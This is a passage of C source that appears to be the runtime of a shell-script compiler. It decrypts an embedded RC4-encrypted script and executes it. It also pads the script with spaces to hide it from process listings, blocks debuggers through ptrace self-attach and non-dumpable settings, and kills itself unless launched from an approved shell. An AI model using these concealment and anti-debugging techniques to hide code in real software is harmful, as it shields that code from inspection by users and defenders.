	fprintf(stderr, "argc=%d\n", argc);
	if (!argv) {
		fprintf(stderr, "argv=<null>\n");
	} else { 
		for (i = 0; i <= argc ; i++)
			fprintf(stderr, "argv[%d]=%.60s\n", i, argv[i] ? argv[i] : "<null>");
	}
}
#endif /* DEBUGEXEC */

void rmarg(char ** argv, char * arg)
{
	for (; argv && *argv && *argv != arg; argv++);
	for (; argv && *argv; argv++)
		*argv = argv[1];
}

void chkenv_end(void);

int chkenv(int argc)
{
	char buff[512];
	unsigned long mask, m;
	int l, a, c;
	char * string;
	extern char ** environ;

	mask = (unsigned long)getpid();
	stte_0();
	 key(&chkenv, (void*)&chkenv_end - (void*)&chkenv);
	 key(&data, sizeof(data));
	 key(&mask, sizeof(mask));
	arc4(&mask, sizeof(mask));
	sprintf(buff, "x%lx", mask);
	string = getenv(buff);
#if DEBUGEXEC
	fprintf(stderr, "getenv(%s)=%s\n", buff, string ? string : "<null>");
#endif
	l = strlen(buff);
	if (!string) {
		/* 1st */
		sprintf(&buff[l], "=%lu %d", mask, argc);
		putenv(strdup(buff));
		return 0;
	}
	c = sscanf(string, "%lu %d%c", &m, &a, buff);
	if (c == 2 && m == mask) {
		/* 3rd */
		rmarg(environ, &string[-l - 1]);
		return 1 + (argc - a);
	}
	return -1;
}

void chkenv_end(void){}

#if HARDENING

static void gets_process_name(const pid_t pid, char * name) {
	char procfile[BUFSIZ];
	sprintf(procfile, "/proc/%d/cmdline", pid);
	FILE* f = fopen(procfile, "r");
	if (f) {
		size_t size;
		size = fread(name, sizeof (char), sizeof (procfile), f);
		if (size > 0) {
			if ('\n' == name[size - 1])
				name[size - 1] = '\0';
		}
		fclose(f);
	}
}

void hardening() {
    prctl(PR_SET_DUMPABLE, 0);
    prctl(PR_SET_PTRACER, -1);

    int pid = getppid();
    char name[256] = {0};
    gets_process_name(pid, name);

    if (   (strcmp(name, "bash") != 0) 
        && (strcmp(name, "/bin/bash") != 0) 
        && (strcmp(name, "sh") != 0) 
        && (strcmp(name, "/bin/sh") != 0) 
        && (strcmp(name, "sudo") != 0) 
        && (strcmp(name, "/bin/sudo") != 0) 
        && (strcmp(name, "/usr/bin/sudo") != 0)
        && (strcmp(name, "gksudo") != 0) 
        && (strcmp(name, "/bin/gksudo") != 0) 
        && (strcmp(name, "/usr/bin/gksudo") != 0) 
        && (strcmp(name, "kdesu") != 0) 
        && (strcmp(name, "/bin/kdesu") != 0) 
        && (strcmp(name, "/usr/bin/kdesu") != 0) 
       )
    {
        printf("Operation not permitted\n");
        kill(getpid(), SIGKILL);
        exit(1);
    }
}

#endif /* HARDENING */

#if !TRACEABLE

#define _LINUX_SOURCE_COMPAT
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>

#if !defined(PT_ATTACHEXC) /* New replacement for PT_ATTACH */
   #if !defined(PTRACE_ATTACH) && defined(PT_ATTACH)
       #define PT_ATTACHEXC	PT_ATTACH
   #elif defined(PTRACE_ATTACH)
       #define PT_ATTACHEXC PTRACE_ATTACH
   #endif
#endif

void untraceable(char * argv0)
{
	char proc[80];
	int pid, mine;

	switch(pid = fork()) {
	case  0:
		pid = getppid();
		/* For problematic SunOS ptrace */
#if defined(__FreeBSD__)
		sprintf(proc, "/proc/%d/mem", (int)pid);
#else
		sprintf(proc, "/proc/%d/as",  (int)pid);
#endif
		close(0);
		mine = !open(proc, O_RDWR|O_EXCL);
		if (!mine && errno != EBUSY)
			mine = !ptrace(PT_ATTACHEXC, pid, 0, 0);
		if (mine) {
			kill(pid, SIGCONT);
		} else {
			perror(argv0);
			kill(pid, SIGKILL);
		}
		_exit(mine);
	case -1:
		break;
	default:
		if (pid == waitpid(pid, 0, 0))
			return;
	}
	perror(argv0);
	_exit(1);
}
#endif /* !TRACEABLE */

char * xsh(int argc, char ** argv)
{
	char * scrpt;
	int ret, i, j;
	char ** varg;
	char * me = argv[0];
	if (me == NULL) { me = getenv("_"); }
	if (me == 0) { fprintf(stderr, "E: neither argv[0] nor $_ works."); exit(1); }

	ret = chkenv(argc);
	stte_0();
	 key(pswd, pswd_z);
	arc4(msg1, msg1_z);
	arc4(date, date_z);
	if (date[0] && (atoll(date)<time(NULL)))
		return msg1;
	arc4(shll, shll_z);
	arc4(inlo, inlo_z);
	arc4(xecc, xecc_z);
	arc4(lsto, lsto_z);
	arc4(tst1, tst1_z);
	 key(tst1, tst1_z);
	arc4(chk1, chk1_z);
	if ((chk1_z != tst1_z) || memcmp(tst1, chk1, tst1_z))
		return tst1;
	arc4(msg2, msg2_z);
	if (ret < 0)
		return msg2;
	varg = (char **)calloc(argc + 10, sizeof(char *));
	if (!varg)
		return 0;
	if (ret) {
		arc4(rlax, rlax_z);
		if (!rlax[0] && key_with_file(shll))
			return shll;
		arc4(opts, opts_z);
#if HARDENING
	    arc4_hardrun(text, text_z);
	    exit(0);
       /* Seccomp Sandboxing - Start */
       seccomp_hardening();
#endif
		arc4(text, text_z);
		arc4(tst2, tst2_z);
		 key(tst2, tst2_z);
		arc4(chk2, chk2_z);
		if ((chk2_z != tst2_z) || memcmp(tst2, chk2, tst2_z))
			return tst2;
		/* Prepend hide_z spaces to script text to hide it. */
		scrpt = malloc(hide_z + text_z);
		if (!scrpt)
			return 0;
		memset(scrpt, (int) ' ', hide_z);
		memcpy(&scrpt[hide_z], text, text_z);
	} else {			/* Reexecute */
		if (*xecc) {
			scrpt = malloc(512);
			if (!scrpt)
				return 0;
			sprintf(scrpt, xecc, me);
		} else {
			scrpt = me;
		}
	}
	j = 0;
#if BUSYBOXON
	varg[j++] = "busybox";
	varg[j++] = "sh";
#else
	varg[j++] = argv[0];		/* My own name at execution */
#endif
	if (ret && *opts)
		varg[j++] = opts;	/* Options on 1st line of code */
	if (*inlo)
		varg[j++] = inlo;	/* Option introducing inline code */
	varg[j++] = scrpt;		/* The script itself */
	if (*lsto)
		varg[j++] = lsto;	/* Option meaning last option */
	i = (ret > 1) ? ret : 0;	/* Args numbering correction */
	while (i < argc)
		varg[j++] = argv[i++];	/* Main run-time arguments */
	varg[j] = 0;			/* NULL terminated array */
#if DEBUGEXEC
	debugexec(shll, j, varg);
#endif
	execvp(shll, varg);
	return shll;
}

int main(int argc, char ** argv)
{
#if SETUID
   setuid(0);
#endif
#if DEBUGEXEC
	debugexec("main", argc, argv);
#endif
#if HARDENING
	hardening();
#endif
#if !TRACEABLE
	untraceable(argv[0]);
#endif
	argv[1] = xsh(argc, argv);
	fprintf(stderr, "%s%s%s: %s\n", argv[0],
		errno ? ": " : "",
		errno ? strerror(errno) : "",
		argv[1] ? argv[1] : "<null>"
	);
	return 1;
}
